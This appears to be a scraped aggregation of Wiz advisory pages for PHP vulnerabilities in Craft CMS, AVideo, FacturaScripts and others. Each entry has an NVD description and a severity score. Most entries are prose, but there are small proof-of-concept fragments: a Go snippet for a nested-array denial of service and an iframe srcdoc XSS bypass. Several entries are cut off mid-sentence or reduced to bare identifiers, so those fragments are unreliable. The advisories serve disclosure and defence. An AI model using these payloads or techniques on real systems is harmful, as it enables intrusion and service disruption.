Webhooks for Craft CMS plugin adds the ability to manage “webhooks” in Craft CMS, which will send GET or POST requests when certain events occur. From version 3.0.0 to before version 3.2.0, the Webhooks plugin renders user-supplied template content through Twig’s renderString() function without sandbox protection. This allows an authenticated user with access to the Craft control panel and permissions to access the Webhooks plugin to inject Twig template code that calls arbitrary PHP functions. This is possible even if allowAdminChanges is set to false. This issue has been patched in version 3.2.0.
Source : NVD
## 8.5
Score
Published March 16, 2026
Severity HIGH
CNA Score 8.5
Affected Technologies
PHP
Has Public Exp
Wiz
CVE-2025-32957 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2025-32957 [HIGH] CVE-2025-32957 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-32957 :
PHP vulnerability analysis and mitigation
baserCMS is a website development framework. Prior to version 5.2.3, the application's restore function allows users to upload a .zip file, which is then automatically extracted. A PHP file inside the archive is included using require_once without validating or restricting the filename. An attacker can craft a malicious PHP file within the zip and achieve arbitrary code execution when it is included. This issue has been patched in version 5.2.3.
Source : NVD
## 7.2
Score
Published March 31, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 20.2
Exploitation Probabili
Wiz
CVE-2026-25513 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.3
CVE-2026-25513 [HIGH] CVE-2026-25513 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25513 :
PHP vulnerability analysis and mitigation
FacturaScripts is open-source enterprise resource planning and accounting software. Prior to version 2025.81, FacturaScripts contains a critical SQL injection vulnerability in the REST API that allows authenticated API users to execute arbitrary SQL queries through the sort parameter. The vulnerability exists in the ModelClass::getOrderBy() method where user-supplied sorting parameters are directly concatenated into the SQL ORDER BY clause without validation or sanitization. This affects all API endpoints that support sorting functionality. This issue has been patched in version 2025.81.
Source : NVD
## 8.3
Score
Published February 4, 2026
Severity HIGH
CNA Score 8.3
Affected Technologies
PHP
Has Public Exploit Yes
Wiz
GHSA-h6rj-3m53-887h Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
[MEDIUM] GHSA-h6rj-3m53-887h Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-h6rj-3m53-887h :
PHP vulnerability analysis and mitigation
## Impact
LoginPacket
## PoC
Connect to the server using a custom client.
LoginPacket
Set the value of invalid_key to a highly recursive or massive object structure (e.g., an array containing millions of elements or deeply nested arrays).
warnUndefinedJsonPropertyHandler
A := make([]interface{}, 1)
ptr := &A
for i := 0; i < 500; i++ {
next := make([]interface{}, 1000)
(*ptr)[0] = next
ptr = &next
}
data := make([]int, 2000000)
for i := 0; i < 100; i++ {
data[i] = i
}
(*ptr)[0] = data
d.PlayFabID = A
## Patches
var_export
## Workarounds
DataPacketReceiveEvent
LoginPacket
JsonMapper
bExceptionOnUndefinedProperty
true
JsonMapper_Exception
Source : NVD
## 7.5
Score
Published April 6, 2026
Severit
Wiz
GHSA-pvcv-q3q7-266g Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
[MEDIUM] GHSA-pvcv-q3q7-266g Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-pvcv-q3q7-266g :
PHP vulnerability analysis and mitigation
## Summary
A flaw in the handling of recovery codes for app-based multi-factor authentication allows the same recovery code to be reused indefinitely. This issue does not affect email-based MFA. It also only applies when recovery codes are enabled.
## Impact
If an attacker gains access to both the user's password and their recovery codes, they can repeatedly complete MFA without the user's app-based second factor. This weakens the expected security of MFA by turning recovery codes into a static, long-term bypass method.
Source : NVD
## 8.1
Score
Published December 9, 2025
Severity HIGH
CNA Score N/A
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA K
Wiz
CVE-2026-22254 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-22254 [MEDIUM] CVE-2026-22254 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22254 :
PHP vulnerability analysis and mitigation
Winter is a free, open-source content management system (CMS) based on the Laravel PHP framework. Versions of Winter CMS before 1.2.10 allow users with access to the CMS Asset Manager were able to upload SVGs without automatic sanitization. To actively exploit this security issue, an attacker would need access to the Backend with a user account with the following permission: cms.manage_assets. The Winter CMS maintainers strongly recommend that the cms.manage_assets permission only be reserved to trusted administrators and developers in general. This vulnerability is fixed in 1.2.10.
Source : NVD
## 3.5
Score
Published February 6, 2026
Severity LOW
CNA Score N/A
Affected Technologies
PHP
Has Public Exploit No
Has CI
Wiz
CVE-2026-5370 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-5370 [MEDIUM] CVE-2026-5370 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-5370 :
PHP vulnerability analysis and mitigation
A vulnerability was identified in krayin laravel-crm up to 2.2. Impacted is the function composeMail of the file packages/Webkul/Admin/tests/e2e-pw/tests/mail/inbox.spec.ts of the component Activities Module/Notes Module. The manipulation leads to cross site scripting. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. The identifier of the patch is 73ed28d466bf14787fdb86a120c656a4af270153. To fix this issue, it is recommended to deploy a patch.
Source : NVD
## 5.1
Score
Published April 2, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probabili
Wiz
CVE-2025-15602 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2025-15602 [HIGH] CVE-2025-15602 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-15602 :
PHP vulnerability analysis and mitigation
Snipe-IT versions prior to 8.3.7 contain sensitive user attributes related to account privileges that are insufficiently protected against mass assignment. An authenticated, low-privileged user can craft a malicious API request to modify restricted fields of another user account, including the Super Admin account. By changing the email address of the Super Admin and triggering a password reset, an attacker can fully take over the Super Admin account, resulting in complete administrative control of the Snipe-IT instance.
Source : NVD
## 8.7
Score
Published March 6, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/
Wiz
CVE-2026-34571 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.9
CVE-2026-34571 [CRITICAL] CVE-2026-34571 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34571 :
PHP vulnerability analysis and mitigation
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, a Stored Cross-Site Scripting (Stored XSS) vulnerability exists in the backend user management functionality. The application fails to properly sanitize user-controlled input before rendering it in the administrative interface, allowing attackers to inject persistent JavaScript code. This results in automatic execution whenever backend users access the affected page, enabling session hijacking, privilege escalation, and full administrative account compromise. This issue has been patched in version 0.31.0.0.
Source : NVD
## 9
Score
Published April 1, 2026
Wiz
CVE-2025-67164 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.9
CVE-2025-67164 [CRITICAL] CVE-2025-67164 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67164 :
PHP vulnerability analysis and mitigation
An authenticated arbitrary file upload vulnerability in the /storage/poc.php component of Pagekit CMS v1.0.18 allows attackers to execute arbitrary code via uploading a crafted PHP file.
Source : NVD
## 9.9
Score
Published December 17, 2025
Severity CRITICAL
CNA Score 9.9
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 30.1
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
pagekit/pagekit
Sources
NVD
Composer Severity CRITICAL No Fix Added at: Dec 21, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, no
Wiz
CVE-2026-30885 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2026-30885 [MEDIUM] CVE-2026-30885 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30885 :
PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. Prior to 25.0, the /objects/playlistsFromUser.json.php endpoint returns all playlists for any user without requiring authentication or authorization. An unauthenticated attacker can enumerate user IDs and retrieve playlist information including playlist names, video IDs, and playlist status for any user on the platform. This vulnerability is fixed in 25.0.
Source : NVD
## 5.5
Score
Published March 10, 2026
Severity MEDIUM
CNA Score 5.5
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 28
Exploitation Probability (EPSS) 0.1
Affected packages and librarie
Wiz
CVE-2025-68954 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2025-68954 [HIGH] CVE-2025-68954 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68954 :
PHP vulnerability analysis and mitigation
Pterodactyl is a free, open-source game server management panel. Versions 1.11.11 and below do not revoke active SFTP connections when a user is removed from a server instance or has their permissions changes with respect to file access over SFTP. This allows a user that was already connected to SFTP to remain connected and access files even after their permissions are revoked. A user must have been connected to SFTP at the time of their permissions being revoked in order for this vulnerability to be exploited. This issue is fixed in version 1.12.0.
Source : NVD
## 7.5
Score
Published January 6, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
PHP
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV
Wiz
CVE-2026-33352 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-33352 [CRITICAL] CVE-2026-33352 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33352 :
PHP vulnerability analysis and mitigation
objects/category.php
getAllCategories()
doNotShowCats
str_replace("'", '', ...)
objects/security.php
Source : NVD
## 9.8
Score
Published March 23, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 11.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity CRITICAL No Fix Added at: Mar 20, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Techno
Wiz
CVE-2026-25633 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
CVE-2026-25633 [MEDIUM] CVE-2026-25633 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25633 :
PHP vulnerability analysis and mitigation
Statamic is a, Laravel + Git powered CMS designed for building websites. Prior to 5.73.6 and 6.2.5, users without permission to view assets are able are able to download them and view their metadata. Logged-out users and users without permission to access the control panel are unable to take advantage of this. This has been fixed in 5.73.6 and 6.2.5.
Source : NVD
## 4.3
Score
Published February 11, 2026
Severity MEDIUM
CNA Score 4.3
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
statamic/cms
Sources
NVD
Composer Severity
Wiz
CVE-2026-2894 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2026-2894 [MEDIUM] CVE-2026-2894 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2894 :
PHP vulnerability analysis and mitigation
A vulnerability was identified in funadmin up to 7.1.0-rc4. Affected by this vulnerability is the function getMember of the file app/frontend/view/login/forget.html. Such manipulation leads to information disclosure. The attack may be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
## 5.5
Score
Published February 21, 2026
Severity MEDIUM
CNA Score 5.5
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15
Exploitation Probability (EPSS) N/A
Affected packages and libraries
funadmin
Wiz
CVE-2026-32816 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.7
CVE-2026-32816 [MEDIUM] CVE-2026-32816 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32816 :
PHP vulnerability analysis and mitigation
Admidio is an open-source user management solution. In versions 5.0.0 through 5.0.6, the delete, activate, and deactivate modes in modules/groups-roles/groups_roles.php perform destructive state changes on organizational roles but never validate an anti-CSRF token. The client-side UI passes a CSRF token to callUrlHideElement(), which includes it in the POST body, but the server-side handlers ignore $_POST["adm_csrf_token"] entirely for these three modes. An attacker who can discover a role UUID (visible in the public cards view when the module is publicly accessible) can embed a forged POST form on any external page and trick any user with the rol_assign_roles right into deleting or toggling roles for the organization. Role de
Wiz
CVE-2026-33759 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-33759 [MEDIUM] CVE-2026-33759 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33759 :
PHP vulnerability analysis and mitigation
objects/playlistsVideos.json.php
watch_later
favorite
playlistsFromUser.json.php
playlists_id
Source : NVD
## 5.3
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 14.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 29, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Com
Wiz
CVE-2026-28784 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-28784 [HIGH] CVE-2026-28784 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28784 :
PHP vulnerability analysis and mitigation
Craft is a content management system (CMS). Prior to 5.8.22 and 4.16.18, it is possible to craft a malicious payload using the Twig map filter in text fields that accept Twig input under Settings in the Craft control panel or using the System Messages utility, which could lead to a RCE. For this to work, you must have administrator access to the Craft Control Panel, and allowAdminChanges must be enabled for this to work, which is against our recommendations for any non-dev environment. Alternatively, you can have a non-administrator account with allowAdminChanges disabled, but you have access to the System Messages utility. Users should update to the patched versions (5.8.22 and 4.16.18) to mitigate the issue.
Source : NVD
Wiz
CVE-2025-67850 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.3
CVE-2025-67850 [HIGH] CVE-2025-67850 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67850 :
PHP vulnerability analysis and mitigation
A flaw was found in moodle. This vulnerability, known as Cross-Site Scripting (XSS), occurs due to insufficient checks on user-provided data in the formula editor's arithmetic expression fields. A remote attacker could inject malicious code into these fields. When other users view these expressions, the malicious code would execute in their web browsers, potentially compromising their data or leading to unauthorized actions.
Source : NVD
## 6.1
Score
Published February 3, 2026
Severity MEDIUM
CNA Score 7.3
Affected Technologies
PHP
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3
Exploitation Probability (EPSS) N/A
Wiz
CVE-2026-27206 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-27206 [HIGH] CVE-2026-27206 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27206 :
PHP vulnerability analysis and mitigation
Zumba Json Serializer is a library to serialize PHP variables in JSON format. In versions 3.2.2 and below, the library allows deserialization of PHP objects from JSON using a special @type field. The deserializer instantiates any class specified in the @type field without restriction. When processing untrusted JSON input, this behavior may allow an attacker to instantiate arbitrary classes available in the application. If a vulnerable application passes attacker-controlled JSON into JsonSerializer::unserialize() and contains classes with dangerous magic methods (such as __wakeup() or __destruct()), this may lead to PHP Object Injection and potentially Remote Code Execution (RCE), depending on available gadget chains in the app
Wiz
CVE-2026-23476 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-23476 [MEDIUM] CVE-2026-23476 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23476 :
PHP vulnerability analysis and mitigation
FacturaScripts is open-source enterprise resource planning and accounting software. Prior to 2025.8, there a reflected XSS bug in FacturaScripts. The problem is in how error messages get displayed. Twig's | raw filter is used, which skips HTML escaping. When triggering a database error (like passing a string where an integer is expected), the error message includes the input and gets rendered without sanitization. This vulnerability is fixed in 2025.8.
Source : NVD
## 5.4
Score
Published February 2, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.3
Exploitation
Wiz
CVE-2026-26990 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-26990 [HIGH] CVE-2026-26990 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26990 :
PHP vulnerability analysis and mitigation
LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring tool. Versions 25.12.0 and below have a Time-Based Blind SQL Injection vulnerability in address-search.inc.php via the address parameter. When a crafted subnet prefix is supplied, the prefix value is concatenated directly into an SQL query without proper parameter binding, allowing an attacker to manipulate query logic and infer database information through time-based conditional responses. This vulnerability requires authentication and is exploitable by any authenticated user. This issue has been fixedd in version 26.2.0.
Source : NVD
## 8.8
Score
Published February 20, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
PHP
Has Public Explo
Wiz
CVE-2026-33162 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.9
CVE-2026-33162 [MEDIUM] CVE-2026-33162 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33162 :
PHP vulnerability analysis and mitigation
Craft CMS is a content management system (CMS). From version 5.3.0 to before version 5.9.14, an authenticated control panel user with only accessCp can move entries across sections via POST /actions/entries/move-to-section, even when they do not have saveEntries:{sectionUid} permission for either source or destination section. This issue has been patched in version 5.9.14.
Source : NVD
## 4.9
Score
Published March 24, 2026
Severity MEDIUM
CNA Score 4.9
Affected Technologies
PHP
Craft CMS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
cpe:2.3:a:craft
Wiz
CVE-2026-24422 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-24422 [MEDIUM] CVE-2026-24422 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24422 :
PHP vulnerability analysis and mitigation
phpMyFAQ is an open source FAQ web application. In versions 4.0.16 and below, multiple public API endpoints improperly expose sensitive user information due to insufficient access controls. The OpenQuestionController::list() endpoint calls Question::getAll() with showAll=true by default, returning records marked as non-public (isVisible=false) along with user email addresses, with similar exposures present in comment, news, and FAQ APIs. This information disclosure vulnerability could enable attackers to harvest email addresses for phishing campaigns or access content that was explicitly marked as private. This issue has been fixed in version 4.0.17.
Source : NVD
## 7.5
Score
Published January 24, 2026
Severity HIGH
CN
Wiz
CVE-2026-24418 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-24418 [HIGH] CVE-2026-24418 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24418 :
PHP vulnerability analysis and mitigation
OpenSTAManager is an open source management software for technical assistance and invoicing. OpenSTAManager v2.9.8 and earlier contain a critical Error-Based SQL Injection vulnerability in the bulk operations handler for the Scadenzario (Payment Schedule) module. The application fails to validate that elements of the id_records array are integers before using them in an SQL IN() clause, allowing attackers to inject arbitrary SQL commands and extract sensitive data through XPATH error messages.
Source : NVD
## 8.7
Score
Published February 6, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probabi
Wiz
CVE-2026-33293 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-33293 [HIGH] CVE-2026-33293 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33293 :
PHP vulnerability analysis and mitigation
deleteDump
plugin/CloneSite/cloneServer.json.php
unlink()
../../
configuration.php
Source : NVD
## 8.1
Score
Published March 22, 2026
Severity HIGH
CNA Score 8.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 14.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 20, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CI
Wiz
CVE-2026-35452 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-35452 [MEDIUM] CVE-2026-35452 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35452 :
PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. In versions 26.0 and prior, the plugin/CloneSite/client.log.php endpoint serves the clone operation log file without any authentication. Every other endpoint in the CloneSite plugin directory enforces User::isAdmin(). The log contains internal filesystem paths, remote server URLs, and SSH connection metadata.
Source : NVD
## 5.3
Score
Published April 6, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity M
Wiz
CVE-2026-34738 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
CVE-2026-34738 [MEDIUM] CVE-2026-34738 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34738 :
PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. In versions 26.0 and prior, AVideo's video processing pipeline accepts an overrideStatus request parameter that allows any uploader to set a video's status to any valid state, including "active" (a). This bypasses the admin-controlled moderation and draft workflows. The setStatus() method validates the status code against a list of known values but does not verify that the caller has permission to set that particular status. As a result, any user with upload permissions can publish videos directly, circumventing content review processes. At time of publication, there are no publicly available patches.
Source : NVD
## 4.3
Score
Published March 31, 2026
Severity MEDIUM
CNA Sc
Wiz
CVE-2026-33041 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-33041 [MEDIUM] CVE-2026-33041 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33041 :
PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. In versions 25.0 and below, /objects/encryptPass.json.php exposes the application's password hashing algorithm to any unauthenticated user. An attacker can submit arbitrary passwords and receive their hashed equivalents, enabling offline password cracking against leaked database hashes. If an attacker obtains password hashes from the database (via SQL injection, backup exposure, etc.), they can instantly crack them by comparing against pre-computed hashes from this endpoint. This endpoint eliminates the need for an attacker to reverse-engineer the hashing algorithm. Combined with the weak hash chain (md5+whirlpool+sha1, no salt by default), an attacker with access to database hashe
Wiz
CVE-2026-30838 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2026-30838 [MEDIUM] CVE-2026-30838 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30838 :
PHP vulnerability analysis and mitigation
league/commonmark is a PHP Markdown parser. Prior to version 2.8.1, the DisallowedRawHtml extension can be bypassed by inserting a newline, tab, or other ASCII whitespace character between a disallowed HTML tag name and the closing >. For example, would pass through unfiltered and be rendered as a valid HTML tag by browsers. This is a cross-site scripting (XSS) vector for any application that relies on this extension to sanitize untrusted user input. All applications using the DisallowedRawHtml extension to process untrusted markdown are affected. Applications that use a dedicated HTML sanitizer (such as HTML Purifier) on the rendered output are not affected. This issue has been patched in version 2.8.1.
Source : NVD
## 5.1
Wiz
CVE-2026-33486 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.8
CVE-2026-33486 [MEDIUM] CVE-2026-33486 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33486 :
PHP vulnerability analysis and mitigation
Roadiz is a polymorphic content management system based on a node system that can handle many types of services. A vulnerability in roadiz/documents prior to versions 2.7.9, 2.6.28, 2.5.44, and 2.3.42 allows an authenticated attacker to read any file on the server's local file system that the web server process has access to, including highly sensitive environment variables, database credentials, and internal configuration files. Versions 2.7.9, 2.6.28, 2.5.44, and 2.3.42 contain a patch.
Source : NVD
## 6.5
Score
Published March 26, 2026
Severity MEDIUM
CNA Score 6.8
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability
Wiz
GHSA-3h6j-9x8m-rg3g Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-3h6j-9x8m-rg3g Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-3h6j-9x8m-rg3g :
PHP vulnerability analysis and mitigation
## Summary
cleanupXss()
safe=1
'elements' => '*+iframe-meta'
srcdoc
|raw
## Root Cause
src/Graby.php
htmLawed($html, [
'safe' => 1, // removes
'elements' => '*+iframe-meta', // re-adds , overrides safe=1
'deny_attribute' => 'style', // srcdoc is NOT denied
]);
safe=1
+iframe
safe
srcdoc
## Proof of Concept
cleanupXss()
Output (unchanged — htmLawed passes it through):
{{ content|raw }}
srcdoc
about:srcdoc
alert(document.domain)
cleanupXss()
## Impact
|raw
In Wallabag: affects both authenticated views and public share pages (unauthenticated)
No CSP headers in default Wallabag config — no secondary mitigation
## Suggested Fix
+iframe
'elements' => '*-iframe-meta',
srcdoc
'deny_attri
Wiz
CVE-2026-4208 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-4208 [MEDIUM] CVE-2026-4208 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-4208 :
PHP vulnerability analysis and mitigation
The extension fails to properly reset the generated MFA code after successful authentication. This leads to a possible MFA bypass for future login attempts by providing an empty string as MFA code to the extensions MFA provider.
Source : NVD
## 7.7
Score
Published March 17, 2026
Severity HIGH
CNA Score 7.7
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17.2
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
ralffreit/mfa-email
Sources
NVD
Composer Severity HIGH Has Fix Added at: Mar 19, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you c
Wiz
CVE-2026-27591 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.9
CVE-2026-27591 [CRITICAL] CVE-2026-27591 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27591 :
PHP vulnerability analysis and mitigation
Winter is a free, open-source content management system (CMS) based on the Laravel PHP framework. Prior to 1.0.477, 1.1.12, and 1.2.12, Winter CMS allowed authenticated backend users to escalate their accounts level of access to the system by modifying the roles / permissions assigned to their account through specially crafted requests to the backend while logged in. To actively exploit this security issue, an attacker would need access to the Backend with a user account with any level of access. This vulnerability is fixed in 1.0.477, 1.1.12, and 1.2.12.
Source : NVD
## 9.9
Score
Published March 11, 2026
Severity CRITICAL
CNA Score 9.9
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA K
Wiz
CVE-2026-34236 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.2
CVE-2026-34236 [HIGH] CVE-2026-34236 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34236 :
PHP vulnerability analysis and mitigation
Auth0-PHP is a PHP SDK for Auth0 Authentication and Management APIs. From version 8.0.0 to before version 8.19.0, in applications built with the Auth0 PHP SDK, cookies are encrypted with insufficient entropy, which may result in threat actors brute-forcing the encryption key and forging session cookies. This issue has been patched in version 8.19.0.
Source : NVD
## 8.2
Score
Published April 1, 2026
Severity HIGH
CNA Score 8.2
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
auth0/auth0-php
Sources
NVD
Composer Severity HIGH
Wiz
CVE-2026-25497 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-25497 [HIGH] CVE-2026-25497 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25497 :
PHP vulnerability analysis and mitigation
